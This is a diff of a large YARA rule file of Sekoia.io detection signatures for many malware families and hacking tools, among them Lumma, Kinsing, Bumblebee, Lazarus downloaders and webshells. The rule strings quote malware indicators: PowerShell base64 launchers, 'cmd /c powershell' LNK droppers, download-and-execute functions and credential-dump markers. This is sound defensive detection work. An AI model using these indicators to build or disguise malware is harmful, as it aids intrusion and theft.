-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gobrat_2.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9f2fdbe2cc39c91b2ac8904fb29a0142bf770859d17590017920203641860a13"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_gamaredon_lnk_usb_spreader_encoded.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01"
+		logic_hash = "81ab55330b3003cb698ade7e14eaea5fb03e5d2d3dd310b7db682aeef9b51f6e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237716,155 +238592,149 @@ rule SEKOIA_Apt_Gobrat_2 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "thisisweird" ascii
-		$ = "ZzZzZzZzZzZz"
+		$s1 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(" ascii
+		$s2 = " 1000000){" base64
+		$s3 = "+\"\\$" base64
+		$s4 = ",3\";" base64
 
 	condition:
-		all of them and uint32be( 0 ) == 0x7f454c46
+		$s1 at 0 and 3 of them and filesize < 4000
 }
-rule SEKOIA_Downloader_Win_Cobianrat : FILE
+rule SEKOIA_Crime_Sload_Vbs_Wsf_Downloader : FILE
 {
 	meta:
-		description = "Detect CobianRAT downloader"
+		description = "Detects sLoad Downloader"
 		author = "Sekoia.io"
-		id = "7a86c17f-bf4e-4465-9488-244b75fc36f1"
-		date = "2024-08-23"
+		id = "55d87205-5f8f-479a-a616-bf3fce571f03"
+		date = "2022-08-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_win_cobianrat.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "7a70779d9d7de5e370fac0fa2d4ccd13"
-		hash = "2ce40599a4990680db3af5defcd5381a"
-		hash = "56515c48f82475e7bb6a26b027a459d7"
-		hash = "3450bece12bd8103d5e718a2661d0404"
-		hash = "132858739129d2b863dc547facbed7e9"
-		hash = "693bd96d162c54d7e9605580eaf54a6e"
-		hash = "d03a4988e22e6c7b2a03efa2bdb1502d"
-		hash = "ab8c68b907ec2ce316bf18f00938710c"
-		logic_hash = "6437a2d0854fb7bd9ddde8434e9a2b95cbb7ccc04381400db211f38a6a575e43"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/crime_sload_vbs_wsf_downloader.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "bd6a9112edb01544463aa7112432ad49360221e89a9ac15d5e8f6731b2b8780a"
 		score = 75
-		quality = 80
+		quality = 76
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {24 00 44 00 6F 00 77 00 6E 00 6C 00 6F 00 61 00 64 00 55 00 72 00 6C 00 20 00 3D 00 20 00 27}
+		$ = { 53 65 74 20 6c 69 6e 6b 20 3d 20 [5-10] 2e 43 72 65 61 74 65 53 68 6f 72 74 63 75 74 28 }
+		$ = { 2e 72 75 6e 20 22 63 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 44 6f 63 75 6d 65 6e 74 73 5c [5-10] 2e 6c 6e 6b 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c }
+		$ = { 3d 22 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c 20 22 }
+		$ = { 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c 20 22 20 26 20 }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		2 of them and filesize < 1KB
 }
-rule SEKOIA_Loader_Win_Konni_Wpnprv : FILE
+rule SEKOIA_Apt_Implant_Xdealer_Linux_Variant_Strings : FILE
 {
 	meta:
-		description = "Detect the wpnprv DLLs used for KONNI for UAC bypass"
+		description = "Detects XDealer linux variant"
 		author = "Sekoia.io"
-		id = "02162533-4ace-42bf-8df0-38b140487f01"
-		date = "2023-09-26"
+		id = "42690513-753f-4296-b641-4d3b59a5e5e1"
+		date = "2024-03-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_konni_wpnprv.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "32178c97795aeead9c186e0b7fb508376045acb7534e6ce9e617c06fd399c3da"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_implant_xdealer_linux_variant_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "400beb53d0f7b7727962175c7c4f8dfccdfed56bb3978d3e847147e8ad7644fb"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$ = "wpnprv.dll"
-		$ = "IIIIIIII" fullword
-		$ = "wusa.exe" wide
-		$ = "winver.exe" wide
-		$ = "MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" wide
-		$ = "taskmgr.exe" wide
+	strings:
+		$ = "ls -l /proc/%s/exe"
+		$ = "Linux_%s_%s_%u"
+		$ = "chkconfig --add"
+		$ = "cmd over return [%s]"
+		$ = "touch   -d"
+		$ = "%s can't be opened/n"
+		$ = "/proc/%s/status"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint32be( 0 ) == 0x7f454c46 and 3 of them and filesize < 1MB
 }
-rule SEKOIA_Apt_Darkpink_Kamikakabot_Strings
+rule SEKOIA_Malware_Valleyrat_Strings_Config : FILE
 {
 	meta:
-		description = "Detects KamiKakaBot strings (.NET sample of Dark Pink)"
+		description = "ValleyRAT strings based on HIVE KEYS and config. "
 		author = "Sekoia.io"
-		id = "0f5a7d72-81c8-4fdd-aefd-136bc6d48aa5"
-		date = "2023-02-22"
+		id = "bb186ab7-60cd-487e-8b9c-c2ff8f121454"
+		date = "2024-08-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_darkpink_kamikakabot_strings.yar#L1-L30"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0bc37c96b591d8edb1fd288ef874b3cc31879ce166b8734a3dd0e29644cbea55"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malware_valleyrat_strings_config.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "b1887a48e59ac7b1b1742854d2a228af"
+		hash = "f6c69e83ce61aacacfbc410345008268"
+		hash = "63ad42e03aca6ce447fb447e21aeb385"
+		hash = "e1d41e5fdfebf8062911ef3c3853b807"
+		hash = "e6cafb4136a9438227086a5826eafe10"
+		hash = "54ba4bbeacd1521164a40e92262b15f6"
+		logic_hash = "89a3d3ca32f9c57e932686f0ed03821350770f82e598948ed86414e231e27a30"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Execute"
-		$ = "f4869"
-		$ = "getIndentifyName"
-		$ = "getMessageAsync"
-		$ = "requestMessageID"
-		$ = "run_command"
-		$ = "sendFile"
-		$ = "sendMessage"
-		$ = "send_brw_data"
-		$ = "updateMessageID"
-		$ = "update_new_token"
-		$ = "update_new_xml"
-		$ = {53 00 74 00 61 00 72 00 74 00 65 00 64 00 20 00 75 00 70 00 20 00 72 00 75 00 6e}
-		$ = {20 00 72 00 65 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 21}
-		$ = {6e 00 65 00 77 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 21}
-		$ = {74 00 6f 00 6b 00 65 00 6e 00 20 00 75 00 70 00 64 00 61 00 74 00 65 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 21 00 21 00 21}
+		$key1 = "IpDateInfo" ascii fullword
+		$key2 = "IpDate" ascii fullword
+		$key3 = "SelfPath" ascii fullword
+		$config1 = {7c 00 69 00 3a 00 }
+		$config2 = {7c 00 70 00 3a 00 }
 
 	condition:
-		6 of them
+		uint16be( 0 ) == 0x4d5a and 1 of ( $key* ) and $config2 in ( @config1 .. @config1 + 100 ) and filesize > 300KB and filesize < 100MB
 }
-rule SEKOIA_Infostealer_Win_Lumma_Strings_Sept23 : FILE
+rule SEKOIA_Bot_Lin_Kinsing_Strings : FILE
 {
 	meta:
-		description = "Finds Lumma samples based on the specific strings"
+		description = "Catch Kinsing malware based on strings"
 		author = "Sekoia.io"
-		id = "45900760-c10d-40c0-a49a-c66358a8a66a"
-		date = "2023-09-14"
+		id = "ce41b6d0-bc22-4a85-a3bb-ed3234871524"
+		date = "2023-11-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_lumma_strings_sept23.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "099dd81a72f8c9dac38fd0f9ab4e99b60f0e7742d6a64313e2989aa8955c01ec"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/bot_lin_kinsing_strings.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "164b22734541d43047a2ea868cf0a269efe69c64a6392030168f4d391b1be777"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2023-10-31"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str10 = "CryptStringToBinaryA" ascii
-		$str11 = "WinHttpQueryDataAvailable" ascii
-		$str12 = "GetComputerNameExA" ascii
-		$str13 = "GetCurrentHwProfileW" ascii
-		$str14 = "ntdll.dll" wide
-		$str16 = "minkernel\\crts\\ucrt\\inc\\corecrt_internal_strtox.h" wide
-		$str17 = "xxxxxxxxxxx" ascii
+		$s1 = "MinerUrl" ascii
+		$s2 = "main.masscan" ascii
+		$s3 = "redisBrute" ascii
+		$s4 = "ActiveC2CUrl" ascii
+		$s5 = "main.getKi" ascii
+		$s6 = "main.getMu" ascii
+		$s7 = "tryToRunMiner" ascii
+		$s8 = "main.kiLoader" ascii
+		$s9 = "main.downloadAndExecute" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SEKOIA_Apt_Sugardump_Credentials_Stealer_Smtp : FILE
+rule SEKOIA_Rule_Lazarus_Generic_Downloader_7C3F94702Fa7 : FILE
 {
 	meta:
-		description = "Detects SUGARDUMP SMTP version"
+		description = "Detects a Generic Downloader used by Lazarus"
 		author = "Sekoia.io"
-		id = "bf028ebc-bfaa-45b3-9a3f-8949a5efbb73"
-		date = "2022-08-23"
+		id = "eb0f0a91-5e72-4358-91a3-7c3f94702fa7"
+		date = "2022-08-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sugardump_credentials_stealer_smtp.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1f423f38ff323e67667e35af5603e608cba6eaf8d98633467b0292c5f81c8d1c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rule_lazarus_generic_downloader_7c3f94702fa7.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1ee58eb760fb74ef089f7d3eb423f314fe1c22e8c85b01eba0e965dea8c846ce"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237872,79 +238742,84 @@ rule SEKOIA_Apt_Sugardump_Credentials_Stealer_Smtp : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<<<<<<<< ------ Passwords Total: {0} --------- >>>>>>>>" wide
-		$ = "Url = {0} , Count = {1}" wide
-		$ = "smtp." wide
-		$ = "encrypted_key\":\"(.*?)\"" wide
+		$ = "%s%s%s%s = %s%s%s%s"
+		$ = "sec-ch-ua-mobile: ?0"
+		$ = "%s>%s"
+		$ = "d$f92&^$#FESAfaSDage#FDa"
+		$ = "Sec-Fetch-User: ?1"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 3 of them
 }
-rule SEKOIA_Rat_Win_Reverserat
+rule SEKOIA_Tool_Petitpotato : FILE
 {
 	meta:
-		description = "Detect SideCopy's ReverseRAT v3 observed in January 2023"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "8fbd395f-f44e-46d5-a942-7c7e88f37127"
-		date = "2023-02-22"
+		id = "72808202-a124-478e-bc60-59d35824b948"
+		date = "2023-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_reverserat.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "b277a824b2671f40298ce03586a2ccc0fca2a081a66230c57a3060c2028f13ee"
-		hash = "8b87459483248d7b95424cd52b7d4f3031e89c6644adc2e167556e071d9ec3aa"
-		logic_hash = "13a5a916e084996ce4d7840581250f7630652acdcad0f66e21763cb3a9cbccc3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_petitpotato.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "93a46c7765ad9f18c2176b98c91edf97827707ffdefcedc40078c87c30343508"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "SELECT maxclockspeed,  datawidth, name, manufacturer FROM Win32_Processor" wide
-		$ = "select * from Win32_PhysicalMemory" wide
-		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide
+		$s2 = "set_FileName" ascii wide
+		$s3 = "VarFileInfo" ascii wide
+		$s4 = "PetitPotato.exe" ascii wide
+		$s5 = "0.0.0.0" ascii wide
 
 	condition:
-		all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
 }
-rule SEKOIA_Apt_Lazarus_Blindingcan_Rtti
+rule SEKOIA_Hacktool_Fscan_Strings : FILE
 {
 	meta:
-		description = "Detects BLINDINGCAN with RTTI"
+		description = "Detects fscan based on strings"
 		author = "Sekoia.io"
-		id = "9a16c189-ffc1-4aa6-8582-298abaecd0ef"
-		date = "2022-10-04"
+		id = "6bef80c3-370c-4168-9d88-3fac88f986b1"
+		date = "2023-12-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_lazarus_blindingcan_rtti.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fbec1f9a180782bf330d86facbada9af018741897c58f4ab6e0b52a1b38ae966"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_fscan_strings.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b1c88af2f90921fab4ac32ef65e226a652b8df2915abc62de0a28af9ad59811c"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = ".?AVCHTTP_Protocol@@" ascii wide fullword
-		$s2 = ".?AVCFileRW@@" ascii wide fullword
+		$ = "Plugins.RdpScan.func1"
+		$ = "Plugins.smb1AnonymousConnectIPC.func1"
+		$ = "WebScan/WebScan.go"
+		$ = "Plugins/CVE-2020-0796.go"
+		$ = "Plugins.SshConn.func4"
+		$ = "Plugins.PostgresScan"
+		$ = "Plugins.(*FCGIClient).Request.func1"
 
 	condition:
-		all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 30MB and 4 of them
 }
-rule SEKOIA_Apt_Kimsuky_Toddlershark_Obfuscated : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_7 : FILE
 {
 	meta:
-		description = "Detects obfuscated version of Kimsuky TODDLERSHARK vbs malware"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "9ab82466-4f38-4597-b75b-13252e180c70"
-		date = "2024-03-06"
+		id = "de8069bb-59d7-4753-974a-f77c4b9e9bae"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_toddlershark_obfuscated.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5f067ce32e7fee5cf481d82bb98f4ae10bd7187078bc111b08fc58d043954152"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_sharpshooter_payload_7.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "27b5f3d24f7269e80b628be044d828d365fdba25891a5a1ecc973c419cf1dc6c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237952,26 +238827,26 @@ rule SEKOIA_Apt_Kimsuky_Toddlershark_Obfuscated : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { 3a 20 [3-10] 20 3d 20 22 [3-30] 22 3a }
-		$s2 = { 45 78 65 63 75 74 65 28  [3-15] 28 22 }
-		$s3 = { 50 72 69 76 61 74 65 20 46 75 6e 63 74 69 6f 6e 20 [3-15] 28 42 79 56 61 6c 20 [3-15] 29 3a }
-		$s4 = "& Chr(\"&H\" & Mid("
+		$ = "ms.Write(ba, 0, (length / 4) * 3)"
+		$ = "var serialized_obj = "
+		$ = "var n = fmt.SurrogateSelector;"
+		$ = "var o = d.DynamicInvoke(al.ToArray())"
 
 	condition:
-		#s4== 1 and #s3 == 1 and #s2 == 1 and #s1 > 20 and filesize < 1MB
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Apt_Luckymouse_Rshell_Strings_All_Platform : FILE
+rule SEKOIA_Loader_Win_Bumblebee : FILE
 {
 	meta:
-		description = "Detects LuckyMouse RShell Mach-O implant"
+		description = "Detect BUMBLEBEE based on specific strings"
 		author = "Sekoia.io"
-		id = "e79a5ee1-96b3-4643-ab11-0b1095e96488"
-		date = "2022-08-05"
+		id = "ff36f512-c700-4f52-bc89-68ab9c69462c"
+		date = "2022-04-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_luckymouse_rshell_strings_all_platform.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ef923b6633a2b7dfa645a31c7c2d0e00872ebad6ec7748568c2b306c29b6b29b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_bumblebee.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "97755e8d593acbc9acc8ce7f1a82a345fc7eea049addbb96577f6abc1b6d5fd6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237979,27 +238854,26 @@ rule SEKOIA_Apt_Luckymouse_Rshell_Strings_All_Platform : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 6C 6F 67 69 6E 00 68 6F
-        73 74 6E 61 6D 65 00 6C
-        61 6E 00 75 73 65 72 6E
-        61 6D 65 00 76 65 72 73
-        69 6F 6E }
+		$str0 = "Z:\\hooker2\\Common\\md5.cpp" wide
+		$str1 = "3C29FEA2-6FE8-4BF9-B98A-0E3442115F67" wide
+		$str2 = "bumblebee" ascii
 
 	condition:
-		filesize < 1MB and all of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule SEKOIA_Apt_Badmagic_Startngrok_Pshscript : FILE
+rule SEKOIA_Tool_Soaphound_Strings : FILE
 {
 	meta:
-		description = "Detects BadMagic StartNgrok powershell script"
+		description = "Detects SOAPHound based on strings"
 		author = "Sekoia.io"
-		id = "94d64482-3033-4531-8530-58546364ac06"
-		date = "2023-05-15"
+		id = "adf48506-f07d-445a-83cc-0aed3b6b55eb"
+		date = "2024-11-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_startngrok_pshscript.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f15f9dc2c35f3f7cd816aa539c03b857254c3628c9b14eacca1110bb85b1a24c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_soaphound_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "b2a953590d75213388473fb51e6b5f2f"
+		logic_hash = "14ff92230d0999a39a6e1042f5c42b5ae275d90ece3d74727e5da44c569a93eb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238007,91 +238881,87 @@ rule SEKOIA_Apt_Badmagic_Startngrok_Pshscript : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$ExecutablePath http \"\"file:///$Disk"
-		$ = "write \"$ExecutablePath not found"
-		$ = "$ng_proxy_string ="
-		$ = "$ng_auth_token ="
-		$ = "$env:ALLUSERSPROFILE\\$NGrokFolderName"
+		$ = "Output files generated in" wide
+		$ = "(&(cn=*)(!(cn=a*))(!(cn=b*))" wide
+		$ = "unicodePassword" wide
+		$ = "net.tcp://localhost:9389/ActiveDirectoryWebServices/" wide
 
 	condition:
-		all of them and filesize < 1KB
+		uint16be( 0 ) == 0x4d5a and filesize < 2MB and all of them
 }
-rule SEKOIA_Webshell_Icesword_Strings : FILE
+rule SEKOIA_Apt_Polonium_Megacreep_Strings : FILE
 {
 	meta:
-		description = "Detects icesword webshell"
+		description = "Tries to detect POLONIUM's MegaCreep implant"
 		author = "Sekoia.io"
-		id = "2c6b3cec-4200-4386-8cd5-4004c9b5b96a"
-		date = "2024-11-22"
+		id = "4d62d5bc-2ec9-58ef-bfe7-c0b04fa73b6f"
+		date = "2022-10-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/webshell_icesword_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "0447352827e61696304a8e3d34e1d270"
-		hash = "f49cfcda0abdefa385eda7ec7e7a5411"
-		hash = "e1518388375ba772ed20503ec6dc6c8a"
-		hash = "ecf08cd6af127e01f913354529174a23"
-		logic_hash = "25ea8c1f4756595e63f09dfdfd1cb0e9bbf1d05e46150e22993de95d9f758385"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_polonium_megacreep_strings.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f4881e15854b082d8e6b8a28a7eb1518c559577b1b3ce76e404d67b1fe723fde"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		orig_id = "927c5fd6-0574-43bf-8db9-6ecc328estrin56c7"
 
 	strings:
-		$ = "&fsAction=rename&newName="
-		$ = "&fsAction=copyto&dstPath="
+		$ = "[#!#]" ascii wide
+		$ = "[$$%$$]" ascii wide
+		$ = ".e##x##e" ascii wide
+		$ = "WHLib.dll" ascii wide
+		$ = "TestService.txt" ascii wide
+		$ = "X = Stop" ascii wide
+		$ = "Sess.dll" ascii wide
+		$ = "filepathOnTarget" ascii wide
+		$ = "FileNameOnMega" ascii wide
+		$ = "Missing Parameter.. Format of command:" ascii wide
+		$ = "Your Old K##E##Y is Wronge" ascii wide
+		$ = "Your Upgrage Is Success" ascii wide
 
 	condition:
-		2 of them and filesize < 100KB
+		uint16be( 0 ) == 0x4d5a and filesize < 2MB and 3 of them
 }
-rule SEKOIA_Implant_Win_Quantum_Builder_Lnk
+rule SEKOIA_Apt_Kimsuky_Validator_Strings : FILE
 {
 	meta:
-		description = "Detect .LNK files created using Quantum Builder"
+		description = "Detects Kimsuky validator"
 		author = "Sekoia.io"
-		id = "65f8a426-8bf3-4f7f-b7d2-fd8da5b660f7"
-		date = "2022-06-22"
+		id = "e055f2d4-8318-4342-812e-0f621d7886b4"
+		date = "2024-06-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_quantum_builder_lnk.yar#L1-L44"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "dd090af0e062b633173ac8483d8659e1fd8aa7898c641714fbe4b30bdd276b3d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_validator_strings.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a627dae8c12f0f6f8472bc12b8e1a85137f92f6e389f817ab9023c90720a42b0"
 		score = 75
-		quality = 30
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$magic_lnk = { 4C 00 00 00 01 14 02 00 }
-		$powershell_ascii = "\\WindowsPowerShell\\v1.0\\powershell.exe"
-		$powershell_wide = "powershell.exe" wide
-		$start = "<#" wide
-		$end = "#>" wide
-		$foreach = "=$Null;foreach(" wide
-		$return = "};return" wide
-		$char = "[char]" wide
-		$aes = "New-Object 'System.Security.Cryptography.AesManaged'" wide nocase
-		$base64 = "[System.Convert]::FromBase64String" wide nocase
-		$decryptor = "CreateDecryptor();" wide nocase
+		$ = "%s%sc %s >%s 2>&1" wide
+		$ = "%s%sc %s 2>%s" wide
 
 	condition:
-		$magic_lnk at 0 and all of ( $powershell* ) and ( $start and $end and $foreach and $return and $char or $aes and $base64 and $decryptor )
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-
-rule SEKOIA_Launcher_Win_Bluehaze : FILE
+rule SEKOIA_Tool_Exploit_Badpotato_Strings : FILE
 {
 	meta:
-		description = "Detect the BLUEHAZE malware"
